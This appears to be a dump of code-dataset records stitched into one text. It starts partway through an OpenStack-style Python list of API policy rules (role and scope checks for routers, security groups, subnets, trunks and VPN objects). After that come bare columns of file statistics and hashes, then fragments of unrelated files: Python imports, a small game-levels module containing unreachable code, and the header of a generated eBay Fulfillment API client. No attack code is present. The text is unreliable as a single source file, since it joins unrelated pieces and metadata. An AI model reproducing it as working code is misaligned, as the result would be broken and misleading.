{"method": "GET", "path": "/routers"},
{"method": "GET", "path": "/routers/{id}"},
],
),
base.APIRule(
name="update_router",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:distributed",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``distributed`` attribute of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:ha",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``ha`` attribute of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``external_gateway_info`` information of a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info:network_id",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``network_id`` attribute of ``external_gateway_info`` information of a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info:enable_snat",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``enable_snat`` attribute of ``external_gateway_info`` information of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="update_router:external_gateway_info:external_fixed_ips",
check_str=("role:admin and system_scope:all"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update ``external_fixed_ips`` attribute of ``external_gateway_info`` information of a router",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/routers/{id}"}],
),
base.APIRule(
name="delete_router",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a router",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/routers/{id}"}],
),
base.APIRule(
name="add_router_interface",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Add an interface to a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}/add_router_interface"}],
),
base.APIRule(
name="remove_router_interface",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Remove an interface from a router",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/routers/{id}/remove_router_interface"}],
),
base.APIRule(
name="create_security_group",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a security group",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/security-groups"}],
),
base.APIRule(
name="get_security_group",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a security group",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/security-groups"},
{"method": "GET", "path": "/security-groups/{id}"},
],
),
base.APIRule(
name="update_security_group",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a security group",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/security-groups/{id}"}],
),
base.APIRule(
name="delete_security_group",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a security group",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/security-groups/{id}"}],
),
base.APIRule(
name="create_security_group_rule",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a security group rule",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/security-group-rules"}],
),
base.APIRule(
name="get_security_group_rule",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:sg_owner"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a security group rule",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/security-group-rules"},
{"method": "GET", "path": "/security-group-rules/{id}"},
],
),
base.APIRule(
name="delete_security_group_rule",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a security group rule",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/security-group-rules/{id}"}],
),
base.APIRule(
name="create_segment",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a segment",
scope_types=["system"],
operations=[{"method": "POST", "path": "/segments"}],
),
base.APIRule(
name="get_segment",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get a segment",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/segments"},
{"method": "GET", "path": "/segments/{id}"},
],
),
base.APIRule(
name="update_segment",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update a segment",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/segments/{id}"}],
),
base.APIRule(
name="delete_segment",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Delete a segment",
scope_types=["system"],
operations=[{"method": "DELETE", "path": "/segments/{id}"}],
),
base.APIRule(
name="get_service_provider",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get service providers",
scope_types=["system", "project"],
operations=[{"method": "GET", "path": "/service-providers"}],
),
base.APIRule(
name="create_subnet",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a subnet",
scope_types=["system", "project"],
operations=[{"method": "POST", "path": "/subnets"}],
),
base.APIRule(
name="create_subnet:segment_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``segment_id`` attribute when creating a subnet",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnets"}],
),
base.APIRule(
name="create_subnet:service_types",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``service_types`` attribute when creating a subnet",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnets"}],
),
base.APIRule(
name="get_subnet",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a subnet",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/subnets"},
{"method": "GET", "path": "/subnets/{id}"},
],
),
base.APIRule(
name="get_subnet:segment_id",
check_str=("role:reader and system_scope:all"),
basic_check_str=("role:admin or role:reader"),
description="Get ``segment_id`` attribute of a subnet",
scope_types=["system"],
operations=[
{"method": "GET", "path": "/subnets"},
{"method": "GET", "path": "/subnets/{id}"},
],
),
base.APIRule(
name="update_subnet",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a subnet",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnets/{id}"}],
),
base.APIRule(
name="update_subnet:segment_id",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``segment_id`` attribute of a subnet",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/subnets/{id}"}],
),
base.APIRule(
name="update_subnet:service_types",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``service_types`` attribute of a subnet",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/subnets/{id}"}],
),
base.APIRule(
name="delete_subnet",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s) or rule:network_owner"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a subnet",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/subnets/{id}"}],
),
base.APIRule(
name="create_subnetpool",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a subnetpool",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/subnetpools"}],
),
base.APIRule(
name="create_subnetpool:shared",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Create a shared subnetpool",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnetpools"}],
),
base.APIRule(
name="create_subnetpool:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Specify ``is_default`` attribute when creating a subnetpool",
scope_types=["system"],
operations=[{"method": "POST", "path": "/subnetpools"}],
),
base.APIRule(
name="get_subnetpool",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s) or rule:shared_subnetpools"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a subnetpool",
scope_types=["system", "project"],
operations=[
{"method": "GET", "path": "/subnetpools"},
{"method": "GET", "path": "/subnetpools/{id}"},
],
),
base.APIRule(
name="update_subnetpool",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}"}],
),
base.APIRule(
name="update_subnetpool:is_default",
check_str=("role:admin and system_scope:all"),
basic_check_str=("role:admin"),
description="Update ``is_default`` attribute of a subnetpool",
scope_types=["system"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}"}],
),
base.APIRule(
name="delete_subnetpool",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "DELETE", "path": "/subnetpools/{id}"}],
),
base.APIRule(
name="onboard_network_subnets",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Onboard existing subnet into a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}/onboard_network_subnets"}],
),
base.APIRule(
name="add_prefixes",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Add prefixes to a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}/add_prefixes"}],
),
base.APIRule(
name="remove_prefixes",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Remove unallocated prefixes from a subnetpool",
scope_types=["system", "project"],
operations=[{"method": "PUT", "path": "/subnetpools/{id}/remove_prefixes"}],
),
base.APIRule(
name="create_trunk",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a trunk",
scope_types=["project", "system"],
operations=[{"method": "POST", "path": "/trunks"}],
),
base.APIRule(
name="get_trunk",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get a trunk",
scope_types=["project", "system"],
operations=[
{"method": "GET", "path": "/trunks"},
{"method": "GET", "path": "/trunks/{id}"},
],
),
base.APIRule(
name="update_trunk",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a trunk",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/trunks/{id}"}],
),
base.APIRule(
name="delete_trunk",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a trunk",
scope_types=["project", "system"],
operations=[{"method": "DELETE", "path": "/trunks/{id}"}],
),
base.APIRule(
name="get_subports",
check_str=(
"(role:reader and system_scope:all) or (role:reader and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="List subports attached to a trunk",
scope_types=["project", "system"],
operations=[{"method": "GET", "path": "/trunks/{id}/get_subports"}],
),
base.APIRule(
name="add_subports",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Add subports to a trunk",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/trunks/{id}/add_subports"}],
),
base.APIRule(
name="remove_subports",
check_str=(
"(role:admin and system_scope:all) or (role:member and project_id:%(project_id)s)"
),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete subports from a trunk",
scope_types=["project", "system"],
operations=[{"method": "PUT", "path": "/trunks/{id}/remove_subports"}],
),
base.APIRule(
name="create_endpoint_group",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a VPN endpoint group",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/endpoint-groups"}],
),
base.APIRule(
name="update_endpoint_group",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a VPN endpoint group",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/endpoint-groups/{id}"}],
),
base.APIRule(
name="delete_endpoint_group",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a VPN endpoint group",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/endpoint-groups/{id}"}],
),
base.APIRule(
name="get_endpoint_group",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get VPN endpoint groups",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/endpoint-groups"},
{"method": "GET", "path": "/vpn/endpoint-groups/{id}"},
],
),
base.APIRule(
name="create_ikepolicy",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an IKE policy",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/ikepolicies"}],
),
base.APIRule(
name="update_ikepolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an IKE policy",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/ikepolicies/{id}"}],
),
base.APIRule(
name="delete_ikepolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an IKE policy",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/ikepolicies/{id}"}],
),
base.APIRule(
name="get_ikepolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get IKE policyies",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/ikepolicies"},
{"method": "GET", "path": "/vpn/ikepolicies/{id}"},
],
),
base.APIRule(
name="create_ipsecpolicy",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an IPsec policy",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/ipsecpolicies"}],
),
base.APIRule(
name="update_ipsecpolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an IPsec policy",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/ipsecpolicies/{id}"}],
),
base.APIRule(
name="delete_ipsecpolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an IPsec policy",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/ipsecpolicies/{id}"}],
),
base.APIRule(
name="get_ipsecpolicy",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get IPsec policies",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/ipsecpolicies"},
{"method": "GET", "path": "/vpn/ipsecpolicies/{id}"},
],
),
base.APIRule(
name="create_ipsec_site_connection",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create an IPsec site connection",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/ipsec-site-connections"}],
),
base.APIRule(
name="update_ipsec_site_connection",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update an IPsec site connection",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/ipsec-site-connections/{id}"}],
),
base.APIRule(
name="delete_ipsec_site_connection",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete an IPsec site connection",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/ipsec-site-connections/{id}"}],
),
base.APIRule(
name="get_ipsec_site_connection",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get IPsec site connections",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/ipsec-site-connections"},
{"method": "GET", "path": "/vpn/ipsec-site-connections/{id}"},
],
),
base.APIRule(
name="create_vpnservice",
check_str=("rule:regular_user"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Create a VPN service",
scope_types=["project"],
operations=[{"method": "POST", "path": "/vpn/vpnservices"}],
),
base.APIRule(
name="update_vpnservice",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Update a VPN service",
scope_types=["project"],
operations=[{"method": "PUT", "path": "/vpn/vpnservices/{id}"}],
),
base.APIRule(
name="delete_vpnservice",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s"
),
description="Delete a VPN service",
scope_types=["project"],
operations=[{"method": "DELETE", "path": "/vpn/vpnservices/{id}"}],
),
base.APIRule(
name="get_vpnservice",
check_str=("rule:admin_or_owner"),
basic_check_str=(
"role:admin or role:reader or role:admin and project_id:%(project_id)s or role:member and project_id:%(project_id)s or role:reader and project_id:%(project_id)s"
),
description="Get VPN services",
scope_types=["project"],
operations=[
{"method": "GET", "path": "/vpn/vpnservices"},
{"method": "GET", "path": "/vpn/vpnservices/{id}"},
],
),
)
__all__ = ("list_rules",)
| 41.63074
| 214
| 0.595531
| 13,084
| 109,697
| 4.772317
| 0.016279
| 0.106372
| 0.081485
| 0.101007
| 0.955174
| 0.933585
| 0.908426
| 0.880527
| 0.833667
| 0.784933
| 0
| 0.000158
| 0.249405
| 109,697
| 2,634
| 215
| 41.646545
| 0.758192
| 0.000109
| 0
| 0.719011
| 0
| 0.08251
| 0.508949
| 0.178742
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00038
| 0
| 0.00038
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
24eafe76fcd9520f8e174d7ca424e39434180934
| 54
|
py
|
Python
|
webviz_config/_dockerize/__init__.py
|
AlexanderSemenyak/webviz-config
|
3602901f215033bddd484ea1c13013a8addaf012
|
[
"MIT"
] | 44
|
2019-04-07T18:46:00.000Z
|
2022-03-28T02:35:58.000Z
|
webviz_config/_dockerize/__init__.py
|
AlexanderSemenyak/webviz-config
|
3602901f215033bddd484ea1c13013a8addaf012
|
[
"MIT"
] | 312
|
2019-03-29T11:49:53.000Z
|
2022-03-07T12:06:34.000Z
|
webviz_config/_dockerize/__init__.py
|
AlexanderSemenyak/webviz-config
|
3602901f215033bddd484ea1c13013a8addaf012
|
[
"MIT"
] | 46
|
2019-03-29T07:23:16.000Z
|
2022-03-28T02:35:59.000Z
|
from ._create_docker_setup import create_docker_setup
| 27
| 53
| 0.907407
| 8
| 54
| 5.5
| 0.625
| 0.545455
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 54
| 1
| 54
| 54
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7005e0e20caa71551c5c3fb422c2757a7b3626b2
| 71
|
py
|
Python
|
xitorch/linalg/__init__.py
|
AdityaJ7/xitorch
|
fec02e225df17f47854646bc57e607f5df659e1d
|
[
"BSD-3-Clause"
] | 4
|
2020-10-15T15:07:54.000Z
|
2022-01-29T23:01:10.000Z
|
xitorch/linalg/__init__.py
|
AdityaJ7/xitorch
|
fec02e225df17f47854646bc57e607f5df659e1d
|
[
"BSD-3-Clause"
] | 7
|
2020-09-16T11:44:34.000Z
|
2020-09-24T13:17:19.000Z
|
xitorch/linalg/__init__.py
|
AdityaJ7/xitorch
|
fec02e225df17f47854646bc57e607f5df659e1d
|
[
"BSD-3-Clause"
] | 2
|
2020-09-17T09:41:33.000Z
|
2020-09-17T10:00:40.000Z
|
from xitorch.linalg.solve import *
from xitorch.linalg.symeig import *
| 23.666667
| 35
| 0.802817
| 10
| 71
| 5.7
| 0.6
| 0.385965
| 0.596491
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.112676
| 71
| 2
| 36
| 35.5
| 0.904762
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
70111c9148ea45ba3ae43f52f1383a7dc1253708
| 2,125
|
py
|
Python
|
lib/levels.py
|
ricardoquesada/pywii
|
313ee8c22861c92a1bd8f93ce8d5ae4d25a15137
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
lib/levels.py
|
ricardoquesada/pywii
|
313ee8c22861c92a1bd8f93ce8d5ae4d25a15137
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
lib/levels.py
|
ricardoquesada/pywii
|
313ee8c22861c92a1bd8f93ce8d5ae4d25a15137
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
import view
from world import *
class LevelOne(view.View):
lives = 100
name = "Level One"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-10,20,10,20) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
return
view.View.setup_level(self)
class LevelTwo(view.View):
lives = 100
name = "Level Two"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-100,20,100,20) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
return
self.addGenerator((0,10))
self.addSegment(-100,20,100,20)
self.addGoal(0,60,15.)
view.View.setup_level(self)
class LevelThree(view.View):
lives = 100
name = "Level Three"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-100,20,100,20) )
self.world.add_passive( LimitedLifeSegment(-100,20,0,100, life=5) )
self.world.add_passive( LimitedLifeSegment(0,100,100,20, life=5) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
view.View.setup_level(self)
class LevelFour(view.View):
lives = 100
name = "Level Four"
target = 20
def setup_level(self):
self.world.add_active( Generator((0,10)) )
self.world.add_passive( Segment(-100,20,100,20) )
self.world.add_passive( LimitedLifeSegment(-100,20,0,100, life=5) )
self.world.add_passive( LimitedLifeSegment(0,100,100,20, life=5) )
self.world.add_attractor( Attractor(-100,20, force=-50) )
self.world.add_attractor( Attractor(5,-50, force=50) )
self.world.add_attractor( Attractor(100,20, force=-50) )
self.world.add_passive( Goal(0,60,15.) )
self.world.add_passive( Floor(-200) )
levels=('one',LevelOne), ('two',LevelTwo), ('three',LevelThree)
| 33.203125
| 75
| 0.618824
| 295
| 2,125
| 4.355932
| 0.152542
| 0.161089
| 0.214786
| 0.236576
| 0.862257
| 0.851362
| 0.710506
| 0.691051
| 0.691051
| 0.691051
| 0
| 0.109816
| 0.232941
| 2,125
| 63
| 76
| 33.730159
| 0.678528
| 0
| 0
| 0.666667
| 0
| 0
| 0.02354
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0.296296
| 0.037037
| 0
| 0.444444
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
704c63f9e4c395644c1acabc1c7a2e24e5f5b5e3
| 33,316
|
py
|
Python
|
src/ebay_rest/api/sell_fulfillment/api/order_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_fulfillment/api/order_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
src/ebay_rest/api/sell_fulfillment/api/order_api.py
|
craiga/ebay_rest
|
a0be2677c65a787e9566df848ffa3ad0c309a9d9
|
[
"MIT"
] | null | null | null |
# coding: utf-8
"""
Fulfillment API
Use the Fulfillment API to complete the process of packaging, addressing, handling, and shipping each order on behalf of the seller, in accordance with the payment method and timing specified at checkout. # noqa: E501
OpenAPI spec version: v1.19.9
